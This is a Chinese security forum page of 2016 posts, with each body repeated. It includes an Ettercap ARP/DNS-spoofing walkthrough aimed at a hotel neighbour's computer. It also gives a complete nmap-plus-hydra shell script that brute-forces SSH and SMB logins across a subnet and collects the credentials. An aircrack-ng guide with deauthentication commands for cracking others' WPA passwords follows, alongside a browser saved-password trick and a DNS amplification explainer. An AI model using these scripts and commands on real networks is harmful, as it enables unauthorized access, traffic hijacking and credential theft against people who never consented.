关于网页记住密码如何查看密码

网络安全mentor 发表了文章 • 7 个评论 • 605 次浏览 • 2016-09-07 14:30 • 来自相关话题

进入登录的页面
审查元素
找到关于密码的那一个input标签
把它的type值更改为text
就可以明文显示所保存的密码
所以不要再公共电脑进行保存密码
 
 
适用于一些基本网站
进入登录的页面
审查元素
找到关于密码的那一个input标签
把它的type值更改为text
就可以明文显示所保存的密码
所以不要再公共电脑进行保存密码
 
 
适用于一些基本网站

[转]利用洪荒之力Ettercap秒杀宾馆隔壁的啪啪啪土豪和妹子

协议安全Shun 发表了文章 • 9 个评论 • 1144 次浏览 • 2016-09-07 11:59 • 来自相关话题

说到住宾馆开房什么的,大家都不陌生了,年轻人宾馆开房,除了啪啪啪还是啪啪啪,但是动作太大就不好了。声音又那么大。尤其是影响到本宝宝休息,那我只能使用洪荒之力,秒杀你们了。
废话不多说了,实现要想干掉对方,就要知道目标的ip地址。也称之为信息收集。我看了一下,我的房间电脑ip地址是192.168.1.105. 然后隔壁是1803房间,那么很显然他的ip地址就是192.168.1.103

为了确认是不是正确,操起十方神器之一,nmap进行了一番狂风乱扫。可以肯定192.168.1.103就是土豪和妹子的房间电脑ip地址。既然能扫到肯定电脑肯定是开启的。

关于Ettercap我就不多介绍了,直接上图片了。语文不好一直让我晚上失眠、
选择要监听的网卡,这个小伙伴可以根据自己的实际情况哦。





 
扫描网络
 





 
查看扫描的到主机ip地址以及网关
 





 
 
设置要欺骗的目标网关和ip地址,也就是隔壁土豪和妹子的电脑ip地址
 





 
我们先开启arp欺骗
 





 
接着开启dns欺骗插件。
 





 
我们来ping下,看看是否dns欺骗成功。
 





 
我们可以很直观的看到,域名已经被解析到了192.168.1.105。其实所有的域名都会被解析到这个ip地址。

下面我们要做一个整人的网页,我这里随便写了几句话保存成了,index.html。
 










 
保存好网页代码之后,我们就要开启WEB服务器了,不然怎么去解析域名让他访问咱们的网页。





 
 
提示开启成功,那么这个时候隔壁的土豪和妹子不管访问什么网站域名都会被解析到下面这个页面。
 





 
好了,大家下去以后自己在虚拟机里面撸撸玩玩得了,可不要去别的地方乱搞,毕竟有些技术方面的东西你不清楚,万一搞了以后,不懂得恢复就麻烦了。




原帖地址:利用洪荒之力Ettercap秒杀宾馆隔壁的啪啪啪土豪和妹子
出自:NoSaFe@xxxvvv123
出自:i春秋论坛
 
  查看全部
说到住宾馆开房什么的,大家都不陌生了,年轻人宾馆开房,除了啪啪啪还是啪啪啪,但是动作太大就不好了。声音又那么大。尤其是影响到本宝宝休息,那我只能使用洪荒之力,秒杀你们了。
废话不多说了,实现要想干掉对方,就要知道目标的ip地址。也称之为信息收集。我看了一下,我的房间电脑ip地址是192.168.1.105. 然后隔壁是1803房间,那么很显然他的ip地址就是192.168.1.103

为了确认是不是正确,操起十方神器之一,nmap进行了一番狂风乱扫。可以肯定192.168.1.103就是土豪和妹子的房间电脑ip地址。既然能扫到肯定电脑肯定是开启的。

关于Ettercap我就不多介绍了,直接上图片了。语文不好一直让我晚上失眠、
选择要监听的网卡,这个小伙伴可以根据自己的实际情况哦。

1.png

 
扫描网络
 

2.png

 
查看扫描的到主机ip地址以及网关
 

3.png

 
 
设置要欺骗的目标网关和ip地址,也就是隔壁土豪和妹子的电脑ip地址
 

4.png

 
我们先开启arp欺骗
 

5.png

 
接着开启dns欺骗插件。
 

6.png

 
我们来ping下,看看是否dns欺骗成功。
 

7.png

 
我们可以很直观的看到,域名已经被解析到了192.168.1.105。其实所有的域名都会被解析到这个ip地址。

下面我们要做一个整人的网页,我这里随便写了几句话保存成了,index.html。
 

8.png


9.png

 
保存好网页代码之后,我们就要开启WEB服务器了,不然怎么去解析域名让他访问咱们的网页。

10101.png

 
 
提示开启成功,那么这个时候隔壁的土豪和妹子不管访问什么网站域名都会被解析到下面这个页面。
 

11.png

 
好了,大家下去以后自己在虚拟机里面撸撸玩玩得了,可不要去别的地方乱搞,毕竟有些技术方面的东西你不清楚,万一搞了以后,不懂得恢复就麻烦了。




原帖地址:利用洪荒之力Ettercap秒杀宾馆隔壁的啪啪啪土豪和妹子
出自:NoSaFe@xxxvvv123
出自:i春秋论坛
 
 

这很安全!

网络安全Infiltration 回复了问题 • 9 人关注 • 6 个回复 • 916 次浏览 • 2016-09-07 11:55 • 来自相关话题

浅谈DNS放大攻击

协议安全pygain 发表了文章 • 8 个评论 • 884 次浏览 • 2016-09-06 20:37 • 来自相关话题

攻击前的准备:
攻击者对所有要使用的DNS服务器进行DNS解析器IP地址欺骗,将询问源地址变为受害者的IP地址,使所有的DNS服务器都将询问回复发送到受害者服务器。
 
 
攻击者找到含有大量DNS记录的网络域名,攻击者向DNS服务器询问所有的域名,此时DNS会产生大量的询问回复数据包,当数据流量过大时,会进行分包回复。
 
攻击开始:
几台电脑使用高频率对数个DNS服务器进行DNS询问,要求服务器返回之前定好的那些有大量DNS记录的域名;DNS找到并发送给DNS解析器。由于IP地址为受害者IP,所有的询问回复都流向受害者IP。
有时这样的询问回复的效果会将询问时的流量放大100赔。
由于DNS发送给受害者的是大量的子数据包,受害者需要进行重组数据包的过程,消耗大量资源,导致服务器不能处理正常的访问请求。
配图





  查看全部
攻击前的准备:
攻击者对所有要使用的DNS服务器进行DNS解析器IP地址欺骗,将询问源地址变为受害者的IP地址,使所有的DNS服务器都将询问回复发送到受害者服务器。
 
 
攻击者找到含有大量DNS记录的网络域名,攻击者向DNS服务器询问所有的域名,此时DNS会产生大量的询问回复数据包,当数据流量过大时,会进行分包回复。
 
攻击开始:
几台电脑使用高频率对数个DNS服务器进行DNS询问,要求服务器返回之前定好的那些有大量DNS记录的域名;DNS找到并发送给DNS解析器。由于IP地址为受害者IP,所有的询问回复都流向受害者IP。
有时这样的询问回复的效果会将询问时的流量放大100赔。
由于DNS发送给受害者的是大量的子数据包,受害者需要进行重组数据包的过程,消耗大量资源,导致服务器不能处理正常的访问请求。
配图

dns.jpg

 

Linux下使用hydra获取linux和windows系统用户名和密码的教程

系统安全katerina 发表了文章 • 5 个评论 • 1420 次浏览 • 2016-09-05 20:22 • 来自相关话题

本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。

第一步:找到网段内存活的主机

使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:

在命令行输入:nmap -sn 172.18.16.0/24 > up.txt 

从up.txt里面过滤出ip地址存到ip.txt里面,代码如下:

cat up.txt | grep for | awk '{print $5}'>ip.txt
 
第二步:使用nmap工具扫描linux和windows的远程端口

linux系统:

cat /etc/ssh/sshd_config 命令查看linux的远程端口,linux的远程端口是22,ssh协议。

windows系统:

开始—运行–cmd下输入 netstat –nba ,命令查看linux的远程端口,windows的远程端口是3389,smb协议。

查到远程登陆窗口后,使用nmap扫描22和3389的端口,代码如下:

nmap -p22,3389 -iL ip.txt > res.txt

第三步:从结果里过滤出22端口开着的ip地址

从结果里过滤出22端口开着的ip地址,存放到sship.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt


sship.txt里面的ip地址都是ssh远程开着的linux系统,接下来我们只要用hydra得到它们的密码就可以远程登陆linux系统了。

第四步:从结果里过滤出3389端口开着的ip地址

从结果里过滤出3389端口开着的ip地址,存放到smbip.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt

与第三步类似,smbip.txt里面的ip地址都是smb远程开着的windows系统,接下来我们只要用hydra得到它们的密码就可以远程登陆windows系统了。

第五步:使用hydra暴力破解linux密码

在命令行输入以下命令:

hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt

这段shell使用了user.txt用户名词典和passwd.txt密码词典以及开启ssh服务的ip地址,使用hydra进行暴力破解,从暴破结果中过滤取出ip地址对应的用户名和密码。


第六步:使用hydra暴力破解windows密码

hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt

与第五步相仿,不同的只是协议和ip地址。


第七步:使用找到的密码远程登陆

linux远程连接命令:

ssh -l root 172.18..

输入这个命令之后,系统会提示你输入密码passwd:,这时候你输入获取的密码就可以远程登陆了。

windows远程连接命令:

smb -l Administrator 172.18..

根据提示输入密码,就可以远程登陆了。

最后,我把这些命令写成了一个shell,如下:
 
#!/bin/sh
para1=$#
para2=$1
if [ $para1 -eq 0 ]; then
echo "请输入你的位置变量"
else
echo "-------------------stpe1 check up host list---------------------------"
echo "nmap -sn $para2 , please wait for moment......"
nmap -sn "$para2">up.txt
cat up.txt | grep for | awk '{print $5}'>ip.txt
echo "up host is done , save to up.txt"
echo "-------------------stpe2 port check 22 and 3389-----------------------"
echo "22 and 3389 port checking... please wait for moment......"
nmap -p22,3389 -iL ip.txt > res.txt
echo "-------------------stpe3 select 22 port------------------------------"
echo "doing 22 save to sship.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
echo "-------------------stpe4 select 3389 port----------------------------"
echo "doing 3389 save to 3389ip.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt


echo "-----------------------------stpe5 attack ssh------------------------"
hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt


echo "-------------------------stpe6 attack 3389---------------------------"
hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt


cat -n find.txt


fi shell运行截图:
 





  查看全部
本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。

第一步:找到网段内存活的主机

使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:

在命令行输入:nmap -sn 172.18.16.0/24 > up.txt 

从up.txt里面过滤出ip地址存到ip.txt里面,代码如下:

cat up.txt | grep for | awk '{print $5}'>ip.txt
 
第二步:使用nmap工具扫描linux和windows的远程端口

linux系统:

cat /etc/ssh/sshd_config 命令查看linux的远程端口,linux的远程端口是22,ssh协议。

windows系统:

开始—运行–cmd下输入 netstat –nba ,命令查看linux的远程端口,windows的远程端口是3389,smb协议。

查到远程登陆窗口后,使用nmap扫描22和3389的端口,代码如下:

nmap -p22,3389 -iL ip.txt > res.txt

第三步:从结果里过滤出22端口开着的ip地址

从结果里过滤出22端口开着的ip地址,存放到sship.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt


sship.txt里面的ip地址都是ssh远程开着的linux系统,接下来我们只要用hydra得到它们的密码就可以远程登陆linux系统了。

第四步:从结果里过滤出3389端口开着的ip地址

从结果里过滤出3389端口开着的ip地址,存放到smbip.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt

与第三步类似,smbip.txt里面的ip地址都是smb远程开着的windows系统,接下来我们只要用hydra得到它们的密码就可以远程登陆windows系统了。

第五步:使用hydra暴力破解linux密码

在命令行输入以下命令:

hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt

这段shell使用了user.txt用户名词典和passwd.txt密码词典以及开启ssh服务的ip地址,使用hydra进行暴力破解,从暴破结果中过滤取出ip地址对应的用户名和密码。


第六步:使用hydra暴力破解windows密码

hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt

与第五步相仿,不同的只是协议和ip地址。


第七步:使用找到的密码远程登陆

linux远程连接命令:

ssh -l root 172.18..

输入这个命令之后,系统会提示你输入密码passwd:,这时候你输入获取的密码就可以远程登陆了。

windows远程连接命令:

smb -l Administrator 172.18..

根据提示输入密码,就可以远程登陆了。

最后,我把这些命令写成了一个shell,如下:
 
#!/bin/sh  
para1=$#
para2=$1
if [ $para1 -eq 0 ]; then
echo "请输入你的位置变量"
else
echo "-------------------stpe1 check up host list---------------------------"
echo "nmap -sn $para2 , please wait for moment......"
nmap -sn "$para2">up.txt
cat up.txt | grep for | awk '{print $5}'>ip.txt
echo "up host is done , save to up.txt"
echo "-------------------stpe2 port check 22 and 3389-----------------------"
echo "22 and 3389 port checking... please wait for moment......"
nmap -p22,3389 -iL ip.txt > res.txt
echo "-------------------stpe3 select 22 port------------------------------"
echo "doing 22 save to sship.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
echo "-------------------stpe4 select 3389 port----------------------------"
echo "doing 3389 save to 3389ip.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt


echo "-----------------------------stpe5 attack ssh------------------------"
hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt


echo "-------------------------stpe6 attack 3389---------------------------"
hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt


cat -n find.txt


fi
shell运行截图:
 

50.png

 

【面试题】网络安全工程师面试题tcp/ip篇

协议安全katerina 发表了文章 • 2 个评论 • 2048 次浏览 • 2016-09-05 20:18 • 来自相关话题

最近在面试网络安全工程师,在面试过程中网络基础知识必须满足以下几点:1、理解模型:尤其必须理解OSI、TCP/IP、Cisco和纵深防御网络模型。
2、理解第二层相关问题:包括了冲突域、广播域、交换与集线、端口安全以及生成树的相关主题
3、理解第三层相关问题:包含了IP路由协议;内部路由协议、如RIPv1/v2 和OSPF;外部路由协议,如BGP、子网络、超网络;网络地址转换(NAT)和IPv6
4、理解第四层相关问题:包含了TCP和UDP、会话的建立、报头和选项、端口地址转换以及常用端口
5、理解五到七层相关问题;包含了应用漏洞、特洛伊/蠕虫/病毒、内容过滤和IDS/ISP/IDP.

我又总结了一下在面试中经常被问到的知识点,算是比较全面的吧,如果大家发现了什么遗漏,希望大家可以提示一下,我会补充起来,方便大家共同学习进步~

下面就是总结的技术点(按照问题出现的频率排列):

1、讲一讲交换机的学习机制

2、TCP的半连接状态是怎样的?

3、什么是DDOS攻击?和DOS攻击有什么区别?

4、DHCP动态分配IP的过程是什么?它的原理是什么?

5、讲一讲什么是ARP协议?

6、ARP投毒过程和原理?该怎么防御ARP投毒?

7、讲一下TCP协议和UDP协议的区别?

8、讲一下TCP的三次握手过程

9、DHCP协议的功能?报文结构?

10、MAC泛红攻击的原理和过程?它的防御方式是什么?

11、ip报头格式是什么?

12、nat转换的原理是什么?和iptables的关系?

PS:后面我会把其中的一些技术写成博文,以便大家在面试中遇到该类问题时可以轻松回答,分分钟搞定面试官,成为牛X的黑客! 查看全部
最近在面试网络安全工程师,在面试过程中网络基础知识必须满足以下几点:1、理解模型:尤其必须理解OSI、TCP/IP、Cisco和纵深防御网络模型。
2、理解第二层相关问题:包括了冲突域、广播域、交换与集线、端口安全以及生成树的相关主题
3、理解第三层相关问题:包含了IP路由协议;内部路由协议、如RIPv1/v2 和OSPF;外部路由协议,如BGP、子网络、超网络;网络地址转换(NAT)和IPv6
4、理解第四层相关问题:包含了TCP和UDP、会话的建立、报头和选项、端口地址转换以及常用端口
5、理解五到七层相关问题;包含了应用漏洞、特洛伊/蠕虫/病毒、内容过滤和IDS/ISP/IDP.

我又总结了一下在面试中经常被问到的知识点,算是比较全面的吧,如果大家发现了什么遗漏,希望大家可以提示一下,我会补充起来,方便大家共同学习进步~

下面就是总结的技术点(按照问题出现的频率排列):

1、讲一讲交换机的学习机制

2、TCP的半连接状态是怎样的?

3、什么是DDOS攻击?和DOS攻击有什么区别?

4、DHCP动态分配IP的过程是什么?它的原理是什么?

5、讲一讲什么是ARP协议?

6、ARP投毒过程和原理?该怎么防御ARP投毒?

7、讲一下TCP协议和UDP协议的区别?

8、讲一下TCP的三次握手过程

9、DHCP协议的功能?报文结构?

10、MAC泛红攻击的原理和过程?它的防御方式是什么?

11、ip报头格式是什么?

12、nat转换的原理是什么?和iptables的关系?

PS:后面我会把其中的一些技术写成博文,以便大家在面试中遇到该类问题时可以轻松回答,分分钟搞定面试官,成为牛X的黑客!

【无线攻防】使用aircrack-ng工具破解wifi密码

无线安全katerina 发表了文章 • 11 个评论 • 1766 次浏览 • 2016-09-05 20:04 • 来自相关话题

目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。

本文将教大家破解用wpa/wpa2加密方式的wifi密码。

现在就让我们开始吧!

工具(海淘回来的网卡):

工具:TL-WN722N 150M高增益USB无线网卡;

自己拍的图,如图1,TPLINK官网找的图,如图2;











第一步:

把USB网卡连接到电脑就能开始用了。

iwconfig,查看网卡有没有加载进来;






第二步:

airmon-ng start wlan0,开启网卡wlan0;
 





 
第三步:

airodump-ng wlan0mon,抓周围wif信号;
 





 
第一次抓周围wifi的时候失败了,我查看了一下,原因是有进程占用了网卡。

第四步:

airmon-ng check kill,杀死占用网卡的进程;
 





 
第五步:

airodump-ng wlan0mon,再次开启监控;
 





 
成功监控到,截图如下:
 


 
见谅一下我打的马赛克~~~~~~~~~~~~~~

第六步:

airodump-ng -c 6 --bssid 7C:A2:3E:87:5E:C0 -w tutu wlan0mon,对其中的一个wifi进行抓包;
 





 
-c 6 是它的CH,也就是信道;

--bssid 7C:A2:3E:87:5E:C0     AP的mac地址;

-w tutu 文件名称是tutu;

wlan0mon 网卡的名称;

抓包截图如下:
 





 
第七步:

假如你够幸运的话,有人连接wifi的话,在第六步就能抓到握手包。很显然我不是那个幸运的人,没办法,只能把wifi里连着的主机踢下去,等他再次连wifi的时候,就能成功滴抓到握手包啦。

踢人的命令:aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon,成功踢掉,一踢掉他又自动连接了,这时候我成功滴抓到了握手包。截图如下:
 










 
第八步:

将抓到的包跑词典,爆破密码,截图如下:
 





 
就这样获取别人的WiFi密码啦~~~~ 查看全部
目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。

本文将教大家破解用wpa/wpa2加密方式的wifi密码。

现在就让我们开始吧!

工具(海淘回来的网卡):

工具:TL-WN722N 150M高增益USB无线网卡;

自己拍的图,如图1,TPLINK官网找的图,如图2;

123.jpg


TL-WN722N.jpg


第一步:

把USB网卡连接到电脑就能开始用了。

iwconfig,查看网卡有没有加载进来;

1.PNG


第二步:

airmon-ng start wlan0,开启网卡wlan0;
 

2.PNG

 
第三步:

airodump-ng wlan0mon,抓周围wif信号;
 

3.PNG

 
第一次抓周围wifi的时候失败了,我查看了一下,原因是有进程占用了网卡。

第四步:

airmon-ng check kill,杀死占用网卡的进程;
 

4.PNG

 
第五步:

airodump-ng wlan0mon,再次开启监控;
 

6.PNG

 
成功监控到,截图如下:
 


 
见谅一下我打的马赛克~~~~~~~~~~~~~~

第六步:

airodump-ng -c 6 --bssid 7C:A2:3E:87:5E:C0 -w tutu wlan0mon,对其中的一个wifi进行抓包;
 

7.PNG

 
-c 6 是它的CH,也就是信道;

--bssid 7C:A2:3E:87:5E:C0     AP的mac地址;

-w tutu 文件名称是tutu;

wlan0mon 网卡的名称;

抓包截图如下:
 

8.PNG

 
第七步:

假如你够幸运的话,有人连接wifi的话,在第六步就能抓到握手包。很显然我不是那个幸运的人,没办法,只能把wifi里连着的主机踢下去,等他再次连wifi的时候,就能成功滴抓到握手包啦。

踢人的命令:aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon,成功踢掉,一踢掉他又自动连接了,这时候我成功滴抓到了握手包。截图如下:
 

9.PNG


13.PNG

 
第八步:

将抓到的包跑词典,爆破密码,截图如下:
 

13.PNG

 
就这样获取别人的WiFi密码啦~~~~

什么才是一个靠谱的弱口令字典?

口令安全wukong 回复了问题 • 7 人关注 • 6 个回复 • 1555 次浏览 • 2016-09-05 20:02 • 来自相关话题

在企业运维安全过程中,怎么能安全、高效的管理系统口令?

口令安全kakaxi 回复了问题 • 4 人关注 • 3 个回复 • 933 次浏览 • 2016-09-05 18:30 • 来自相关话题